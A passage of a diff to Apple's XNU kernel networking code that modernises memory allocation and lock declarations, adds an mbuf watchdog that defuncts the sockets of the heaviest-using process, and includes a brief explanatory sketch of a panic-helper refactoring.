-                       FREE(pp, M_TEMP);
-               }
+               kheap_free(KHEAP_DEFAULT, pru, sizeof(struct pr_usrreqs));
+               kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw));
        }
 
        domain_guard_release(guard);
@@ -602,10 +600,10 @@ net_del_proto(int type, int protocol, struct domain *dp)
 
        detach_proto(pp, dp);
        if (pp->pr_usrreqs->pru_flags & PRUF_OLD) {
-               FREE(pp->pr_usrreqs, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, pp->pr_usrreqs, sizeof(struct pr_usrreqs));
        }
        if (pp->pr_flags & PR_OLD) {
-               FREE(pp, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw));
        }
 
        return 0;
@@ -653,10 +651,10 @@ net_del_proto_old(int type, int protocol, struct domain_old *odp)
        }
        detach_proto(pp, dp);
        if (pp->pr_usrreqs->pru_flags & PRUF_OLD) {
-               FREE(pp->pr_usrreqs, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, pp->pr_usrreqs, sizeof(struct pr_usrreqs));
        }
        if (pp->pr_flags & PR_OLD) {
-               FREE(pp, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw));
        }
 
 done:
@@ -736,23 +734,6 @@ domaininit(void)
        domain_guard_t guard;
 
        eventhandler_lists_ctxt_init(&protoctl_evhdlr_ctxt);
-       /*
-        * allocate lock group attribute and group for domain mutexes
-        */
-       domain_proto_mtx_grp_attr = lck_grp_attr_alloc_init();
-
-       domain_proto_mtx_grp = lck_grp_alloc_init("domain",
-           domain_proto_mtx_grp_attr);
-
-       /*
-        * allocate the lock attribute for per domain mutexes
-        */
-       domain_proto_mtx_attr = lck_attr_alloc_init();
-
-       lck_mtx_init(&domain_proto_mtx, domain_proto_mtx_grp,
-           domain_proto_mtx_attr);
-       lck_mtx_init(&domain_timeout_mtx, domain_proto_mtx_grp,
-           domain_proto_mtx_attr);
 
        guard = domain_guard_deploy();
        /*
index ab5dbd3246aeedc7f4d196b4d956ec8722338def..f73bcbda505b293d63cc504655b4b407010d8e91 100644 (file)
@@ -80,6 +80,8 @@
 #include <sys/domain.h>
 #include <sys/queue.h>
 #include <sys/proc.h>
+#include <sys/filedesc.h>
+#include <sys/file_internal.h>
 
 #include <dev/random/randomdev.h>
 
@@ -88,7 +90,7 @@
 #include <kern/queue.h>
 #include <kern/sched_prim.h>
 #include <kern/backtrace.h>
-#include <kern/cpu_number.h>
+#include <kern/percpu.h>
 #include <kern/zalloc.h>
 
 #include <libkern/OSAtomic.h>
@@ -96,6 +98,7 @@
 #include <libkern/libkern.h>
 
 #include <os/log.h>
+#include <os/ptrtools.h>
 
 #include <IOKit/IOMapper.h>
 
 
 /* TODO: should be in header file */
 /* kernel translater */
-extern vm_offset_t kmem_mb_alloc(vm_map_t, int, int, kern_return_t *);
 extern ppnum_t pmap_find_phys(pmap_t pmap, addr64_t va);
 extern vm_map_t mb_map;         /* special map */
 
@@ -325,11 +327,9 @@ static const char *mb_kmem_stats_labels[] = { "INVALID_ARGUMENT",
                                              "OTHERS" };
 
 /* Global lock */
-decl_lck_mtx_data(static, mbuf_mlock_data);
-static lck_mtx_t *mbuf_mlock = &mbuf_mlock_data;
-static lck_attr_t *mbuf_mlock_attr;
-static lck_grp_t *mbuf_mlock_grp;
-static lck_grp_attr_t *mbuf_mlock_grp_attr;
+static LCK_GRP_DECLARE(mbuf_mlock_grp, "mbuf");
+static LCK_MTX_DECLARE(mbuf_mlock_data, &mbuf_mlock_grp);
+static lck_mtx_t *const mbuf_mlock = &mbuf_mlock_data;
 
 /* Back-end (common) layer */
 static uint64_t mb_expand_cnt;
@@ -577,11 +577,9 @@ static struct mtrace *mleak_traces;
 static struct mtrace *mleak_top_trace[MLEAK_NUM_TRACES];
 
 /* Lock to protect mleak tables from concurrent modification */
-decl_lck_mtx_data(static, mleak_lock_data);
-static lck_mtx_t *mleak_lock = &mleak_lock_data;
-static lck_attr_t *mleak_lock_attr;
-static lck_grp_t *mleak_lock_grp;
-static lck_grp_attr_t *mleak_lock_grp_attr;
+static LCK_GRP_DECLARE(mleak_lock_grp, "mleak_lock");
+static LCK_MTX_DECLARE(mleak_lock_data, &mleak_lock_grp);
+static lck_mtx_t *const mleak_lock = &mleak_lock_data;
 
 /* *Failed* large allocations. */
 struct mtracelarge {
@@ -596,11 +594,8 @@ static struct mtracelarge mtracelarge_table[MTRACELARGE_NUM_TRACES];
 static void mtracelarge_register(size_t size);
 
 /* Lock to protect the completion callback table */
-static lck_grp_attr_t *mbuf_tx_compl_tbl_lck_grp_attr = NULL;
-static lck_attr_t *mbuf_tx_compl_tbl_lck_attr = NULL;
-static lck_grp_t *mbuf_tx_compl_tbl_lck_grp = NULL;
-decl_lck_rw_data(, mbuf_tx_compl_tbl_lck_rw_data);
-lck_rw_t *mbuf_tx_compl_tbl_lock = &mbuf_tx_compl_tbl_lck_rw_data;
+static LCK_GRP_DECLARE(mbuf_tx_compl_tbl_lck_grp, "mbuf_tx_compl_tbl");
+LCK_RW_DECLARE(mbuf_tx_compl_tbl_lock, &mbuf_tx_compl_tbl_lck_grp);
 
 extern u_int32_t high_sb_max;
 
@@ -1028,24 +1023,14 @@ struct mbstat mbstat;
  * anything beyond that (up to type 255) is considered a corner case.
  */
 typedef struct {
-       unsigned int    cpu_mtypes[MT_MAX];
-} __attribute__((aligned(MAX_CPU_CACHE_LINE_SIZE), packed)) mtypes_cpu_t;
-
-typedef struct {
-       mtypes_cpu_t    mbs_cpu[1];
+       unsigned int cpu_mtypes[MT_MAX];
 } mbuf_mtypes_t;
 
-static mbuf_mtypes_t *mbuf_mtypes;      /* per-CPU statistics */
-
-#define MBUF_MTYPES_SIZE(n) \
-       __builtin_offsetof(mbuf_mtypes_t, mbs_cpu[n])
-
-#define MTYPES_CPU(p) \
-       ((mtypes_cpu_t *)(void *)((char *)(p) + MBUF_MTYPES_SIZE(cpu_number())))
+static mbuf_mtypes_t PERCPU_DATA(mbuf_mtypes);
 
 #define mtype_stat_add(type, n) {                                       \
        if ((unsigned)(type) < MT_MAX) {                                \
-               mtypes_cpu_t *mbs = MTYPES_CPU(mbuf_mtypes);            \
+               mbuf_mtypes_t *mbs = PERCPU_GET(mbuf_mtypes);           \
                atomic_add_32(&mbs->cpu_mtypes[type], n);               \
        } else if ((unsigned)(type) < (unsigned)MBSTAT_MTYPES_MAX) {    \
                atomic_add_16((int16_t *)&mbstat.m_mtypes[type], n);    \
@@ -1059,29 +1044,23 @@ static mbuf_mtypes_t *mbuf_mtypes;      /* per-CPU statistics */
 static void
 mbuf_mtypes_sync(boolean_t locked)
 {
-       int m, n;
-       mtypes_cpu_t mtc;
+       mbuf_mtypes_t mtc;
 
        if (locked) {
                LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED);
        }
 
-       bzero(&mtc, sizeof(mtc));
-       for (m = 0; m < ncpu; m++) {
-               mtypes_cpu_t *scp = &mbuf_mtypes->mbs_cpu[m];
-               mtypes_cpu_t temp;
-
-               bcopy(&scp->cpu_mtypes, &temp.cpu_mtypes,
-                   sizeof(temp.cpu_mtypes));
-
-               for (n = 0; n < MT_MAX; n++) {
-                       mtc.cpu_mtypes[n] += temp.cpu_mtypes[n];
+       mtc = *PERCPU_GET_MASTER(mbuf_mtypes);
+       percpu_foreach_secondary(mtype, mbuf_mtypes) {
+               for (int n = 0; n < MT_MAX; n++) {
+                       mtc.cpu_mtypes[n] += mtype->cpu_mtypes[n];
                }
        }
+
        if (!locked) {
                lck_mtx_lock(mbuf_mlock);
        }
-       for (n = 0; n < MT_MAX; n++) {
+       for (int n = 0; n < MT_MAX; n++) {
                mbstat.m_mtypes[n] = mtc.cpu_mtypes[n];
        }
        if (!locked) {
@@ -1302,13 +1281,11 @@ mbuf_table_init(void)
        unsigned int b, c, s;
        int m, config_mbuf_jumbo = 0;
 
-       MALLOC(omb_stat, struct omb_stat *, OMB_STAT_SIZE(NELEM(mbuf_table)),
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(omb_stat != NULL);
+       omb_stat = zalloc_permanent(OMB_STAT_SIZE(NELEM(mbuf_table)),
+           ZALIGN(struct omb_stat));
 
-       MALLOC(mb_stat, mb_stat_t *, MB_STAT_SIZE(NELEM(mbuf_table)),
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(mb_stat != NULL);
+       mb_stat = zalloc_permanent(MB_STAT_SIZE(NELEM(mbuf_table)),
+           ZALIGN(mb_stat_t));
 
        mb_stat->mbs_cnt = NELEM(mbuf_table);
        for (m = 0; m < NELEM(mbuf_table); m++) {
@@ -1466,13 +1443,49 @@ mbuf_get_class(struct mbuf *m)
 bool
 mbuf_class_under_pressure(struct mbuf *m)
 {
-       int mclass = mbuf_get_class(m); // TODO - how can we get the class easily???
+       int mclass = mbuf_get_class(m);
+
+       if (m_total(mclass) - m_infree(mclass) >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) {
+               /*
+                * The above computation does not include the per-CPU cached objects.
+                * As a fast-path check this is good-enough. But now we do
+                * the "slower" count of the cached objects to know exactly the
+                * number of active mbufs in use.
+                *
+                * We do not take the mbuf_lock here to avoid lock-contention. Numbers
+                * might be slightly off but we don't try to be 100% accurate.
+                * At worst, we drop a packet that we shouldn't have dropped or
+                * we might go slightly above our memory-pressure threshold.
+                */
+               mcache_t *cp = m_cache(mclass);
+               mcache_cpu_t *ccp = &cp->mc_cpu[0];
+
+               int bktsize = os_access_once(ccp->cc_bktsize);
+               uint32_t bl_total = os_access_once(cp->mc_full.bl_total);
+               uint32_t cached = 0;
+               int i;
+
+               for (i = 0; i < ncpu; i++) {
+                       ccp = &cp->mc_cpu[i];
+
+                       int cc_objs = os_access_once(ccp->cc_objs);
+                       if (cc_objs > 0) {
+                               cached += cc_objs;
+                       }
+
+                       int cc_pobjs = os_access_once(ccp->cc_pobjs);
+                       if (cc_pobjs > 0) {
+                               cached += cc_pobjs;
+                       }
+               }
+               cached += (bl_total * bktsize);
 
-       if (m_total(mclass) >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) {
-               os_log(OS_LOG_DEFAULT,
-                   "%s memory-pressure on mbuf due to class %u, total %u max %u",
-                   __func__, mclass, m_total(mclass), m_maxlimit(mclass));
-               return true;
+               if (m_total(mclass) - m_infree(mclass) - cached >= (m_maxlimit(mclass) * mb_memory_pressure_percentage) / 100) {
+                       os_log(OS_LOG_DEFAULT,
+                           "%s memory-pressure on mbuf due to class %u, total %u free %u cached %u max %u",
+                           __func__, mclass, m_total(mclass), m_infree(mclass), cached, m_maxlimit(mclass));
+                       return true;
+               }
        }
 
        return false;
@@ -1527,7 +1540,6 @@ mbinit(void)
 {
        unsigned int m;
        unsigned int initmcl = 0;
-       void *buf;
        thread_t thread = THREAD_NULL;
 
        microuptime(&mb_start);
@@ -1628,12 +1640,6 @@ mbinit(void)
        /* Setup the mbuf table */
        mbuf_table_init();
 
-       /* Global lock for common layer */
-       mbuf_mlock_grp_attr = lck_grp_attr_alloc_init();
-       mbuf_mlock_grp = lck_grp_alloc_init("mbuf", mbuf_mlock_grp_attr);
-       mbuf_mlock_attr = lck_attr_alloc_init();
-       lck_mtx_init(mbuf_mlock, mbuf_mlock_grp, mbuf_mlock_attr);
-
        /*
         * Allocate cluster slabs table:
         *
@@ -1644,9 +1650,8 @@ mbinit(void)
         */
        maxslabgrp =
            (P2ROUNDUP(nmbclusters, (MBSIZE >> MCLSHIFT)) << MCLSHIFT) >> MBSHIFT;
-       MALLOC(slabstbl, mcl_slabg_t * *, maxslabgrp * sizeof(mcl_slabg_t *),
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(slabstbl != NULL);
+       slabstbl = zalloc_permanent(maxslabgrp * sizeof(mcl_slabg_t *),
+           ZALIGN(mcl_slabg_t));
 
        /*
         * Allocate audit structures, if needed:
@@ -1661,14 +1666,11 @@ mbinit(void)
                int l;
                mcl_audit_t *mclad;
                maxclaudit = ((maxslabgrp << MBSHIFT) >> PAGE_SHIFT);
-               MALLOC(mclaudit, mcl_audit_t *, maxclaudit * sizeof(*mclaudit),
-                   M_TEMP, M_WAITOK | M_ZERO);
-               VERIFY(mclaudit != NULL);
+               mclaudit = zalloc_permanent(maxclaudit * sizeof(*mclaudit),
+                   ZALIGN(mcl_audit_t));
                for (l = 0, mclad = mclaudit; l < maxclaudit; l++) {
-                       MALLOC(mclad[l].cl_audit, mcache_audit_t * *,
-                           NMBPG * sizeof(mcache_audit_t *),
-                           M_TEMP, M_WAITOK | M_ZERO);
-                       VERIFY(mclad[l].cl_audit != NULL);
+                       mclad[l].cl_audit = zalloc_permanent(NMBPG * sizeof(mcache_audit_t *),
+                           ZALIGN_PTR);
                }
 
                mcl_audit_con_cache = mcache_create("mcl_audit_contents",
@@ -1682,11 +1684,6 @@ mbinit(void)
 
        /* Enable mbuf leak logging, with a lock to protect the tables */
 
-       mleak_lock_grp_attr = lck_grp_attr_alloc_init();
-       mleak_lock_grp = lck_grp_alloc_init("mleak_lock", mleak_lock_grp_attr);
-       mleak_lock_attr = lck_attr_alloc_init();
-       lck_mtx_init(mleak_lock, mleak_lock_grp, mleak_lock_attr);
-
        mleak_activate();
 
        /*
@@ -1696,23 +1693,14 @@ mbinit(void)
         * before alignment is not saved.
         */
        ncpu = ml_wait_max_cpus();
-       MALLOC(buf, void *, MBUF_MTYPES_SIZE(ncpu) + CPU_CACHE_LINE_SIZE,
-           M_TEMP, M_WAITOK);
-       VERIFY(buf != NULL);
-
-       mbuf_mtypes = (mbuf_mtypes_t *)P2ROUNDUP((intptr_t)buf,
-           CPU_CACHE_LINE_SIZE);
-       bzero(mbuf_mtypes, MBUF_MTYPES_SIZE(ncpu));
 
        /* Calculate the number of pages assigned to the cluster pool */
        mcl_pages = (nmbclusters << MCLSHIFT) / PAGE_SIZE;
-       MALLOC(mcl_paddr, ppnum_t *, mcl_pages * sizeof(ppnum_t),
-           M_TEMP, M_WAITOK);
-       VERIFY(mcl_paddr != NULL);
+       mcl_paddr = zalloc_permanent(mcl_pages * sizeof(ppnum_t),
+           ZALIGN(ppnum_t));
 
        /* Register with the I/O Bus mapper */
        mcl_paddr_base = IOMapperIOVMAlloc(mcl_pages);
-       bzero((char *)mcl_paddr, mcl_pages * sizeof(ppnum_t));
 
        embutl = (mbutl + (nmbclusters * MCLBYTES));
        VERIFY(((embutl - mbutl) % MBIGCLBYTES) == 0);
@@ -1820,8 +1808,7 @@ mbinit(void)
        }
 
        /* allocate space for mbuf_dump_buf */
-       MALLOC(mbuf_dump_buf, char *, MBUF_DUMP_BUF_SIZE, M_TEMP, M_WAITOK);
-       VERIFY(mbuf_dump_buf != NULL);
+       mbuf_dump_buf = zalloc_permanent(MBUF_DUMP_BUF_SIZE, ZALIGN_NONE);
 
        if (mbuf_debug & MCF_DEBUG) {
                printf("%s: MLEN %d, MHLEN %d\n", __func__,
@@ -1832,26 +1819,6 @@ mbinit(void)
            (nmbclusters << MCLSHIFT) >> MBSHIFT,
            (nclusters << MCLSHIFT) >> MBSHIFT,
            (njcl << MCLSHIFT) >> MBSHIFT);
-
-       /* initialize lock form tx completion callback table */
-       mbuf_tx_compl_tbl_lck_grp_attr = lck_grp_attr_alloc_init();
-       if (mbuf_tx_compl_tbl_lck_grp_attr == NULL) {
-               panic("%s: lck_grp_attr_alloc_init failed", __func__);
-               /* NOTREACHED */
-       }
-       mbuf_tx_compl_tbl_lck_grp = lck_grp_alloc_init("mbuf_tx_compl_tbl",
-           mbuf_tx_compl_tbl_lck_grp_attr);
-       if (mbuf_tx_compl_tbl_lck_grp == NULL) {
-               panic("%s: lck_grp_alloc_init failed", __func__);
-               /* NOTREACHED */
-       }
-       mbuf_tx_compl_tbl_lck_attr = lck_attr_alloc_init();
-       if (mbuf_tx_compl_tbl_lck_attr == NULL) {
-               panic("%s: lck_attr_alloc_init failed", __func__);
-               /* NOTREACHED */
-       }
-       lck_rw_init(mbuf_tx_compl_tbl_lock, mbuf_tx_compl_tbl_lck_grp,
-           mbuf_tx_compl_tbl_lck_attr);
 }
 
 /*
@@ -2995,6 +2962,30 @@ m_vm_error_stats(uint32_t *cnt, uint64_t *ts, uint64_t *size,
        }
 }
 
+static vm_offset_t
+kmem_mb_alloc(vm_map_t mbmap, int size, int physContig, kern_return_t *err)
+{
+       vm_offset_t addr = 0;
+       kern_return_t kr = KERN_SUCCESS;
+
+       if (!physContig) {
+               kr = kernel_memory_allocate(mbmap, &addr, size, 0,
+                   KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF);
+       } else {
+               kr = kmem_alloc_contig(mbmap, &addr, size, PAGE_MASK, 0xfffff,
+                   0, KMA_KOBJECT | KMA_LOMEM, VM_KERN_MEMORY_MBUF);
+       }
+
+       if (kr != KERN_SUCCESS) {
+               addr = 0;
+       }
+       if (err) {
+               *err = kr;
+       }
+
+       return addr;
+}
+
 /*
  * Allocate some number of mbuf clusters and place on cluster freelist.
  */
@@ -6786,6 +6777,110 @@ mbuf_waiter_dec(mbuf_class_t class, boolean_t comp)
        }
 }
 
+static bool mbuf_watchdog_defunct_active = false;
+
+static uint32_t
+mbuf_watchdog_socket_space(struct socket *so)
+{
+       if (so == NULL) {
+               return 0;
+       }
+
+       return so->so_snd.sb_mbcnt + so->so_rcv.sb_mbcnt;
+}
+
+struct mbuf_watchdog_defunct_args {
+       struct proc *top_app;
+       uint32_t top_app_space_used;
+};
+
+static int
+mbuf_watchdog_defunct_iterate(proc_t p, void *arg)
+{
+       struct fileproc *fp = NULL;
+       struct mbuf_watchdog_defunct_args *args =
+           (struct mbuf_watchdog_defunct_args *)arg;
+       uint32_t space_used = 0;
+
+       proc_fdlock(p);
+       fdt_foreach(fp, p) {
+               struct fileglob *fg = fp->fp_glob;
+               struct socket *so = NULL;
+
+               if (FILEGLOB_DTYPE(fg) != DTYPE_SOCKET) {
+                       continue;
+               }
+               so = (struct socket *)fp->fp_glob->fg_data;
+               /*
+                * We calculate the space without the socket
+                * lock because we don't want to be blocked
+                * by another process that called send() and
+                * is stuck waiting for mbufs.
+                *
+                * These variables are 32-bit so we don't have
+                * to worry about incomplete reads.
+                */
+               space_used += mbuf_watchdog_socket_space(so);
+       }
+       proc_fdunlock(p);
+       if (space_used > args->top_app_space_used) {
+               if (args->top_app != NULL) {
+                       proc_rele(args->top_app);
+               }
+               args->top_app = p;
+               args->top_app_space_used = space_used;
+
+               return PROC_CLAIMED;
+       } else {
+               return PROC_RETURNED;
+       }
+}
+
+extern char *proc_name_address(void *p);
+
+static void
+mbuf_watchdog_defunct(thread_call_param_t arg0, thread_call_param_t arg1)
+{
+#pragma unused(arg0, arg1)
+       struct mbuf_watchdog_defunct_args args = {};
+       struct fileproc *fp = NULL;
+
+       proc_iterate(PROC_ALLPROCLIST,
+           mbuf_watchdog_defunct_iterate, &args, NULL, NULL);
+
+       /*
+        * Defunct all sockets from this app.
+        */
+       if (args.top_app != NULL) {
+               os_log(OS_LOG_DEFAULT, "%s: defuncting all sockets from %s.%d",
+                   __func__,
+                   proc_name_address(args.top_app),
+                   proc_pid(args.top_app));
+               proc_fdlock(args.top_app);
+               fdt_foreach(fp, args.top_app) {
+                       struct fileglob *fg = fp->fp_glob;
+                       struct socket *so = NULL;
+
+                       if (FILEGLOB_DTYPE(fg) != DTYPE_SOCKET) {
+                               continue;
+                       }
+                       so = (struct socket *)fp->fp_glob->fg_data;
+                       socket_lock(so, 0);
+                       if (sosetdefunct(args.top_app, so,
+                           SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL,
+                           TRUE) == 0) {
+                               sodefunct(args.top_app, so,
+                                   SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL);
+                       }
+                       socket_unlock(so, 0);
+               }
+               proc_fdunlock(args.top_app);
+               proc_rele(args.top_app);
+               mbstat.m_forcedefunct++;
+       }
+       mbuf_watchdog_defunct_active = false;
+}
+
 /*
  * Called during slab (blocking and non-blocking) allocation.  If there
  * is at least one waiter, and the time since the first waiter is blocked
@@ -6796,13 +6891,43 @@ mbuf_watchdog(void)
 {
        struct timeval now;
        unsigned int since;
+       static thread_call_t defunct_tcall = NULL;
 
        if (mb_waiters == 0 || !mb_watchdog) {
                return;
        }
 
+       LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED);
+
        microuptime(&now);
        since = now.tv_sec - mb_wdtstart.tv_sec;
+
+       /*
+        * Check if we are about to panic the system due
+        * to lack of mbufs and start defuncting sockets
+        * from processes that use too many sockets.
+        *
+        * We're always called with the mbuf_mlock held,
+        * so that also protects mbuf_watchdog_defunct_active.
+        */
+       if (since >= MB_WDT_MAXTIME / 2 && !mbuf_watchdog_defunct_active) {
+               /*
+                * Start a thread to defunct sockets
+                * from apps that are over-using their socket
+                * buffers.
+                */
+               if (defunct_tcall == NULL) {
+                       defunct_tcall =
+                           thread_call_allocate_with_options(mbuf_watchdog_defunct,
+                           NULL,
+                           THREAD_CALL_PRIORITY_KERNEL,
+                           THREAD_CALL_OPTIONS_ONCE);
+               }
+               if (defunct_tcall != NULL) {
+                       mbuf_watchdog_defunct_active = true;
+                       thread_call_enter(defunct_tcall);
+               }
+       }
        if (since >= MB_WDT_MAXTIME) {
                panic_plain("%s: %d waiters stuck for %u secs\n%s", __func__,
                    mb_waiters, since, mbuf_dump());
@@ -7060,11 +7185,9 @@ slab_get(void *buf)
                lck_mtx_unlock(mbuf_mlock);
 
                /* This is a new buffer; create the slabs group for it */
-               MALLOC(slg, mcl_slabg_t *, sizeof(*slg), M_TEMP,
-                   M_WAITOK | M_ZERO);
-               MALLOC(slg->slg_slab, mcl_slab_t *, sizeof(mcl_slab_t) * NSLABSPMB,
-                   M_TEMP, M_WAITOK | M_ZERO);
-               VERIFY(slg != NULL && slg->slg_slab != NULL);
+               slg = zalloc_permanent_type(mcl_slabg_t);
+               slg->slg_slab = zalloc_permanent(sizeof(mcl_slab_t) * NSLABSPMB,
+                   ZALIGN(mcl_slab_t));
 
                lck_mtx_lock(mbuf_mlock);
                /*
@@ -7471,13 +7594,25 @@ __abortlike
 static void
 mcl_audit_mcheck_panic(struct mbuf *m)
 {
+       char buf[DUMP_MCA_BUF_SIZE];
        mcache_audit_t *mca;
 
        MRANGE(m);
        mca = mcl_audit_buf2mca(MC_MBUF, (mcache_obj_t *)m);
 
        panic("mcl_audit: freed mbuf %p with type 0x%x (instead of 0x%x)\n%s\n",
-           m, (u_int16_t)m->m_type, MT_FREE, mcache_dump_mca(mca));
+           m, (u_int16_t)m->m_type, MT_FREE, mcache_dump_mca(buf, mca));
+       /* NOTREACHED */
+}
+
+__abortlike
+static void
+mcl_audit_verify_nextptr_panic(void *next, mcache_audit_t *mca)
+{
+       char buf[DUMP_MCA_BUF_SIZE];
+       panic("mcl_audit: buffer %p modified after free at offset 0: "
+           "%p out of range [%p-%p)\n%s\n",
+           mca->mca_addr, next, mbutl, embutl, mcache_dump_mca(buf, mca));
        /* NOTREACHED */
 }
 
@@ -7486,10 +7621,7 @@ mcl_audit_verify_nextptr(void *next, mcache_audit_t *mca)
 {
        if (next != NULL && !MBUF_IN_MAP(next) &&
            (next != (void *)MCACHE_FREE_PATTERN || !mclverify)) {
-               panic("mcl_audit: buffer %p modified after free at offset 0: "
-                   "%p out of range [%p-%p)\n%s\n",
-                   mca->mca_addr, next, mbutl, embutl, mcache_dump_mca(mca));
-               /* NOTREACHED */
+               mcl_audit_verify_nextptr_panic(next, mca);
        }
 }
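The two hunks above follow the same refactoring: the panic and its large on-stack dump buffer move into a dedicated __abortlike helper so the fast path stays small. A minimal sketch, with hypothetical names (my_validate, DIAG_BUF_SIZE):

    #define DIAG_BUF_SIZE 512       /* hypothetical; the commit uses DUMP_MCA_BUF_SIZE */

    __abortlike
    static void
    my_validate_panic(const void *bad_ptr)
    {
            char buf[DIAG_BUF_SIZE];        /* large buffer lives only on the cold path */

            snprintf(buf, sizeof(buf), "unexpected pointer %p", bad_ptr);
            panic("my_validate: %s", buf);
            /* NOTREACHED */
    }

    static void
    my_validate(const void *ptr)
    {
            if (__improbable(ptr == NULL)) {
                    my_validate_panic(ptr);
            }
    }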
 
@@ -7514,17 +7646,11 @@ mleak_activate(void)
            mleak_alloc_buckets * sizeof(struct mallocation);
        vm_size_t trace_size = mleak_trace_buckets * sizeof(struct mtrace);
 
-       MALLOC(mleak_allocations, struct mallocation *, alloc_size,
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(mleak_allocations != NULL);
+       mleak_allocations = zalloc_permanent(alloc_size, ZALIGN(struct mallocation));
+       mleak_traces = zalloc_permanent(trace_size, ZALIGN(struct mtrace));
+       mleak_stat = zalloc_permanent(MLEAK_STAT_SIZE(MLEAK_NUM_TRACES),
+           ZALIGN(mleak_stat_t));
 
-       MALLOC(mleak_traces, struct mtrace *, trace_size,
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(mleak_traces != NULL);
-
-       MALLOC(mleak_stat, mleak_stat_t *, MLEAK_STAT_SIZE(MLEAK_NUM_TRACES),
-           M_TEMP, M_WAITOK | M_ZERO);
-       VERIFY(mleak_stat != NULL);
        mleak_stat->ml_cnt = MLEAK_NUM_TRACES;
 #ifdef __LP64__
        mleak_stat->ml_isaddr64 = 1;
@@ -8689,11 +8815,12 @@ _mbwdog_logger(const char *func, const int line, const char *fmt, ...)
 
        LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED);
        if (mbwdog_logging == NULL) {
-               mbwdog_logging = _MALLOC(mbwdog_logging_size,
-                   M_TEMP, M_ZERO | M_NOWAIT);
-               if (mbwdog_logging == NULL) {
-                       return;
-               }
+               /*
+                * This might block under a mutex, which isn't really great,
+                * but this happens once, so we'll live.
+                */
+               mbwdog_logging = zalloc_permanent(mbwdog_logging_size,
+                   ZALIGN_NONE);
        }
        va_start(ap, fmt);
        vsnprintf(p, sizeof(p), fmt, ap);
@@ -8729,80 +8856,6 @@ SYSCTL_PROC(_kern_ipc, OID_AUTO, mbwdog_log,
     CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_LOCKED,
     0, 0, sysctl_mbwdog_log, "A", "");
 
-static int mbtest_val;
-static int mbtest_running;
-
-static void
-mbtest_thread(__unused void *arg)
-{
-       int i;
-       int scale_down = 1;
-       int iterations = 250;
-       int allocations = nmbclusters;
-       iterations = iterations / scale_down;
-       allocations = allocations / scale_down;
-       printf("%s thread starting\n", __func__);
-       for (i = 0; i < iterations; i++) {
-               unsigned int needed = allocations;
-               struct mbuf *m1, *m2, *m3;
-
-               if (njcl > 0) {
-                       needed = allocations;
-                       m3 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, M16KCLBYTES);
-                       m_freem_list(m3);
-               }
-
-               needed = allocations;
-               m2 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, MBIGCLBYTES);
-               m_freem_list(m2);
-
-               m1 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, MCLBYTES);
-               m_freem_list(m1);
-       }
-
-       printf("%s thread ending\n", __func__);
-
-       OSDecrementAtomic(&mbtest_running);
-       wakeup_one((caddr_t)&mbtest_running);
-}
-
-static void
-sysctl_mbtest(void)
-{
-       /* We launch three threads - wait for all of them */
-       OSIncrementAtomic(&mbtest_running);
-       OSIncrementAtomic(&mbtest_running);
-       OSIncrementAtomic(&mbtest_running);
-
-       thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10);
-       thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10);
-       thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10);
-
-       while (mbtest_running) {
-               msleep((caddr_t)&mbtest_running, NULL, PUSER, "mbtest_running", NULL);
-       }
-}
-
-static int
-mbtest SYSCTL_HANDLER_ARGS
-{
-#pragma unused(arg1, arg2)
-       int error = 0, val, oldval = mbtest_val;
-
-       val = oldval;
-       error = sysctl_handle_int(oidp, &val, 0, req);
-       if (error || !req->newptr) {
-               return error;
-       }
-
-       if (val != oldval) {
-               sysctl_mbtest();
-       }
-
-       mbtest_val = val;
-
-       return error;
-}
 #endif // DEBUG || DEVELOPMENT
 
 static void
@@ -8835,9 +8888,6 @@ mtracelarge_register(size_t size)
 
 SYSCTL_DECL(_kern_ipc);
 #if DEBUG || DEVELOPMENT
-SYSCTL_PROC(_kern_ipc, OID_AUTO, mbtest,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_LOCKED, &mbtest_val, 0, &mbtest, "I",
-    "Toggle to test mbufs");
 #endif
 SYSCTL_PROC(_kern_ipc, KIPC_MBSTAT, mbstat,
     CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_LOCKED,
index e1a5241a2ddb1f81f65e81a85bf531ef84a529ac..cc13d328c48a00f0d3797a158de195e727f3b745 100644 (file)
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 1998-2020 Apple Inc. All rights reserved.
+ * Copyright (c) 1998-2021 Apple Inc. All rights reserved.
  *
  * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
  *
@@ -153,10 +153,8 @@ static u_int32_t        so_cache_time;
 static int              socketinit_done;
 static struct zone      *so_cache_zone;
 
-static lck_grp_t        *so_cache_mtx_grp;
-static lck_attr_t       *so_cache_mtx_attr;
-static lck_grp_attr_t   *so_cache_mtx_grp_attr;
-static lck_mtx_t        *so_cache_mtx;
+static LCK_GRP_DECLARE(so_cache_mtx_grp, "so_cache");
+static LCK_MTX_DECLARE(so_cache_mtx, &so_cache_mtx_grp);
 
 #include <machine/limits.h>
